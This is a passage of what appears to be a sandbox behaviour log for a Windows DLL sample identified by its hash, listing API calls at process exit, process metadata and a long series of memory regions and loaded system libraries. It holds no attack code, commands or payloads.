HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575eb0 | out: hHeap=0x560000) returned 1 [0281.711] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0281.711] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56ac70 | out: hHeap=0x560000) returned 1 [0281.711] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575ae0 | out: hHeap=0x560000) returned 1 [0281.711] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0281.712] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0281.712] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0281.712] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0281.712] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0281.715] LocalFree (hMem=0x569740) returned 0x0 [0281.715] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0281.716] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0281.716] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5719d0 | out: hHeap=0x560000) returned 1 [0281.716] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574650 | out: hHeap=0x560000) returned 1 [0281.716] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0281.717] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0281.717] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0281.717] ExitProcess (uExitCode=0x0) [0281.717] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56c2f0 | out: hHeap=0x560000) returned 1 Thread: id = 194 os_tid = 0xdc0 Thread: id = 214 os_tid = 0x38c Process: id = "24" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x130c1000" os_pid = "0x1010" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6209 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6210 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6211 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6212 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6213 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6214 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6215 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6216 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6217 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 6218 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 6219 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6220 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6221 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6222 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 6223 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 6224 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6225 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6226 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6227 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6228 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 6229 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6230 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6231 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6232 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6233 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6234 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6235 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6236 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6237 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6238 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6239 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6240 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6241 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6242 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6243 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6244 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6246 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6247 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 6248 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6249 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 6250 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6251 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 6252 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6253 start_va = 0x1e70000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 6254 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 6258 start_va = 0x1e70000 end_va = 0x1f2ffff monitored = 0 entry_point = 0x1e90da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6259 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 6260 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 6266 start_va = 0x1e70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 6267 start_va = 0x2010000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 6268 start_va = 0x2210000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 6269 start_va = 0x2610000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 6271 start_va = 0x2e10000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 6587 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 6655 start_va = 0x3de0000 end_va = 0x4116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7224 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 7225 start_va = 0x4120000 end_va = 0x43a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7942 start_va = 0x4120000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8163 start_va = 0x4120000 end_va = 0x42e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8606 start_va = 0x4120000 end_va = 0x56a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 10468 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 10569 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 10570 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 10571 start_va = 0x4120000 end_va = 0x42e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 10854 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 10855 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10856 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11034 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11131 start_va = 0x4120000 end_va = 0x4284fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 11390 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 11391 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11392 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11394 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11395 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11396 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11397 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11398 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11399 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11400 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11401 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11402 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11403 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11404 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11405 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11407 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11408 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11409 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11410 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11411 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11412 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11413 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11414 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11415 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11416 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11417 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11418 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11419 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11420 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11421 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11422 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11423 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11424 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11425 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11426 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11427 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11428 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11429 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11430 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11431 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11432 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11433 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11434 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11435 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 